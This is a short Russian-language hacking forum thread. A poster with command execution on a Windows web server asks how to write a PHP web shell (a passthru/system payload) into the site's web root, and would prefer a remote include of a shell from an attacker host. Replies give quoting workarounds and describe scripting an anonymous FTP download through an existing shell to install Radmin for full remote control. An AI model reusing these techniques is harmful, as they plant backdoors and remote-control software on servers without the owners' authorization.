Вопрос такой! Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой так создается echo test > "D:\Website\WWW\1.php" если так вообще ничего не создается echo <?php passthru $cmd?> > "D:\Website\WWW\1.php" если так ,создается, но с кавычками echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php" т.е. на выходе получаю "<?php passthru $cmd?>" Php на серваке есть! Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?> p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!
gold-goblin Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win
а ты сделай "<?php phpinfo();?>" обязательно - php проверил локально, работает. "<?phpinfo();?>" тоже выводит ""
Создай сначала сам файл: echo > 1.php Затем отредакти его: edit > 1.php и впиши свой код, затем сохрани и все)
смотри за пробелами!!! <? phpinfo(); ?> попробуй так еще: эхом создаешь файл с кавычками, через more - попробуй их убрать потом. ну а если сделаешь вместо кавычек табуляцию, то потом: more /T1 file.php
У меня была подобная ситуация. У меня был шел вида <?php system(cmd) ?>. Вся проблема состоит в том, что тебе дает выполнять только одну команду. И команда edit ничего не даст. Решение было такое - так как "сервак" виндовый - можно залить Radmin и уже спомощью него можно делать что угодно. Залить лучше всего через ФТП. команды такие Code: echo open ТВОЙ_FTP>go echo binary >>go echo get файл>go .... echo bye>go Запускать потом (ftp анонимный) site.com/shell.php?cmd=ftp -A -s:go
